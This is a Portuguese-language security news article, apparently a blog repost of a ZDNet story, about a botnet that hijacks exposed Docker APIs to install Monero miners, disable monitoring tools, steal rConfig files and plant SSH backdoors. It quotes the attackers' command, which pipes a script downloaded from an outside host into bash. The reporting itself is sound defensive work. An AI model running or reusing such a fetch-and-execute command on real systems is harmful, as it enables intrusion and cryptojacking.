Hackers sequestram Docker através de APIs para mineração

Hackers sequestram Docker através de APIs para mineração. Grupo de hackers seqüestram sistemas Docker com terminais de API expostos na internet.

É quase 2020 e alguns administradores de sistema ainda estão deixando as portas administrativas do Docker expostas na Internet.

Atualmente, um grupo de hackers faz uma varredura em massa na Internet, procurando plataformas Docker que possuem terminais de API expostos on-line.  objetivo dessas varreduras é permitir que o grupo de hackers envie comandos para a instância do Docker e implante um minerador de criptomoeda nas instâncias Docker das empresas, para gerar fundos para os próprios lucros do grupo.

Essa operação de varredura em massa começou no fim de semana de 24 de novembro, e imediatamente se destacou devido ao seu tamanho. Os usuários da API CTI da Bad Packets observam que a atividade de exploração direcionada às instâncias expostas do Docker não é novidade e acontece com bastante frequência“, disse Troy Mursch, diretor de pesquisa e co-fundador da Bad Packets LLC, à ZDNet .

O que diferenciou esta campanha foi o grande aumento da atividade de digitalização. Isso justificou uma investigação mais aprofundada para descobrir o que essa botnet estava fazendo“, disse ele.

Como outros observaram, essa não é sua tentativa média de exploração infantil de scripts“, disse Mursch, que descobriu a campanha. “Houve um nível moderado de esforço nessa campanha e ainda não analisamos completamente tudo o que faz até o momento“.

 

 Que se sabe até agora !

O que se sabe até agora é que o grupo por trás desses ataques atualmente está verificando mais de 59.000 redes IP (netblocks) procurando instâncias expostas do Docker.

Depois que o grupo identifica um host exposto, os atacantes usam o endpoint da API para iniciar um contêiner Alpine Linux OS, onde executam o seguinte comando:

chroot / mnt / bin / sh -c ‘curl -sL4 http://ix.io/1XQa | bash;

O comando acima baixa e executa um script Bash no servidor do invasor. Este script instala um minerador de criptomoeda XMRRig clássico. Nos dois dias desde que essa campanha está ativa, os hackers já extraíram 14,82 moedas de Monero (XMR), no valor de pouco mais de US$ 740, observou Mursch.

Além disso, essa operação de malware também vem com uma medida de autodefesa. Uma função não original mas interessante da campanha é que ela desinstala os agentes de monitoramento conhecidos e mata vários processos por meio de um script baixado de http: // ix [.] Io / 1XQh“, disse Mursch.

Examinando esse script, não apenas vemos que os hackers estão desativando os produtos de segurança, mas também estão encerrando os processos associados às botnets rivais de mineração de moedas, como o DDG .

Além disso, Mursch também descobriu uma função do script mal-intencionado que verifica um host infectado em busca de arquivos de configuração do rConfig , que ele criptografa e rouba, enviando os arquivos de volta ao servidor de comando e controle do grupo.

Além disso, Craig H. Rowland, fundador da Sandfly Security, também notou que os hackers também estão criando contas de backdoor nos contêineres invadidos e deixando as chaves SSH para trás para facilitar o acesso e uma maneira de controlar todos os bots infectados de um local remoto.

Por enquanto, Mursch recomenda que usuários e organizações que executam instâncias do Docker verifiquem imediatamente se estão expondo terminais de API na Internet, fechem as portas e finalizem contêineres em execução não reconhecidos.

Fonte: ZDNet

Veja também:

 
Sobre mindsecblog 2399 Artigos
Blog patrocinado por MindSec Segurança e Tecnologia da Informação Ltda.

4 Trackbacks / Pingbacks

  1. Indústria Automobilistica em foco BMW e a Hyundai são alvo de hackers
  2. F5 adquire a Shape Security por US $ 1 bilhão e aumenta seu portfólio
  3. Regulamentação do Marco Civil e suas consequências
  4. Profissionais de segurança admite violações internas acidentais

Deixe sua opinião!